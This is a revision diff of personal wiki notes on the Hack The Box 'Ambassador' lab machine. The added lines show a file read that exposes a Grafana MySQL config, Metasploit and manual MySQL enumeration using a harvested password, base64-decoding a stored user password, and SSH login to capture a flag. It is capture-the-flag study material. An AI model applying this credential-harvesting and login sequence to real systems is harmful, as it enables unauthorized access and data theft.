ex:htb:ambassador:start
Differences
This shows you the differences between two versions of the page.
| Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
| ex:htb:ambassador:start [2022/12/22 11:29] – ebaer | ex:htb:ambassador:start [2022/12/22 17:44] (current) – ebaer | ||
|---|---|---|---|
| Line 240: | Line 240: | ||
| GET / | GET / | ||
| </ | </ | ||
| + | |||
| + | < | ||
| + | / | ||
| + | |||
| + | GET / | ||
| + | |||
| + | HTTP/1.1 200 OK | ||
| + | Accept-Ranges: | ||
| + | Cache-Control: | ||
| + | Content-Length: | ||
| + | Content-Type: | ||
| + | Expires: -1 | ||
| + | Last-Modified: | ||
| + | Pragma: no-cache | ||
| + | X-Content-Type-Options: | ||
| + | X-Frame-Options: | ||
| + | X-Xss-Protection: | ||
| + | Date: Thu, 22 Dec 2022 13:26:24 GMT | ||
| + | Connection: close | ||
| + | |||
| + | apiVersion: 1 | ||
| + | |||
| + | datasources: | ||
| + | - name: mysql.yaml | ||
| + | type: mysql | ||
| + | host: localhost | ||
| + | | ||
| + | user: grafana | ||
| + | | ||
| + | | ||
| + | |||
| + | </ | ||
| + | |||
| + | ===== msf mysql enum ===== | ||
| + | |||
| + | < | ||
| + | msf6 > use auxiliary/ | ||
| + | msf6 auxiliary(admin/ | ||
| + | |||
| + | Name: MySQL Enumeration Module | ||
| + | | ||
| + | License: Metasploit Framework License (BSD) | ||
| + | Rank: Normal | ||
| + | |||
| + | Provided by: | ||
| + | Carlos Perez < | ||
| + | |||
| + | Check supported: | ||
| + | No | ||
| + | |||
| + | Basic options: | ||
| + | Name Current Setting | ||
| + | ---- --------------- | ||
| + | PASSWORD | ||
| + | RHOSTS | ||
| + | RPORT | ||
| + | USERNAME | ||
| + | |||
| + | Description: | ||
| + | This module allows for simple enumeration of MySQL Database Server | ||
| + | provided proper credentials to connect remotely. | ||
| + | |||
| + | References: | ||
| + | https:// | ||
| + | |||
| + | |||
| + | View the full module info with the info -d command. | ||
| + | |||
| + | msf6 auxiliary(admin/ | ||
| + | PASSWORD => dontStandSoCloseToMe63221! | ||
| + | msf6 auxiliary(admin/ | ||
| + | RHOSTS => 10.129.228.56 | ||
| + | msf6 auxiliary(admin/ | ||
| + | username => grafana | ||
| + | msf6 auxiliary(admin/ | ||
| + | ConnectTimeout => 30 | ||
| + | msf6 auxiliary(admin/ | ||
| + | |||
| + | </ | ||
| + | |||
| + | -> Timeout (anti metasploit measures?) | ||
| + | |||
| + | ===== MySQL manual ===== | ||
| + | |||
| + | < | ||
| + | show databases; | ||
| + | use information_schema | ||
| + | select * from tables; | ||
| + | |||
| + | |||
| + | | def | whackywidget | ||
| + | | def | performance_schema | innodb_redo_log_files | ||
| + | +---------------+--------------------+------------------------------------------------------+-------------+--------------------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+--------------------+----------+---------------------------------------+------------------------------------------+ | ||
| + | 329 rows in set (0.325 sec) | ||
| + | |||
| + | MySQL [information_schema]> | ||
| + | Reading table information for completion of table and column names | ||
| + | You can turn off this feature to get a quicker startup with -A | ||
| + | |||
| + | Database changed | ||
| + | MySQL [whackywidget]> | ||
| + | +------------------------+ | ||
| + | | Tables_in_whackywidget | | ||
| + | +------------------------+ | ||
| + | | users | | ||
| + | +------------------------+ | ||
| + | 1 row in set (0.048 sec) | ||
| + | |||
| + | MySQL [whackywidget]> | ||
| + | +-----------+------------------------------------------+ | ||
| + | | user | pass | | ||
| + | +-----------+------------------------------------------+ | ||
| + | | developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== | | ||
| + | +-----------+------------------------------------------+ | ||
| + | 1 row in set (0.047 sec) | ||
| + | |||
| + | </ | ||
| + | |||
| + | < | ||
| + | echo " | ||
| + | anEnglishManInNewYork027468 | ||
| + | |||
| + | </ | ||
| + | |||
| + | |||
| + | < | ||
| + | sh developer@10.129.228.56 | ||
| + | developer@10.129.228.56' | ||
| + | Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64) | ||
| + | |||
| + | [...] | ||
| + | |||
| + | Last login: Fri Sep 2 02:33:30 2022 from 10.10.0.1 | ||
| + | developer@ambassador: | ||
| + | bdff80ba21c478079a3332f785c4ddba | ||
| + | |||
| + | |||
ex/htb/ambassador/start.1671704949.txt.gz · Last modified: 2022/12/22 11:29 by ebaer
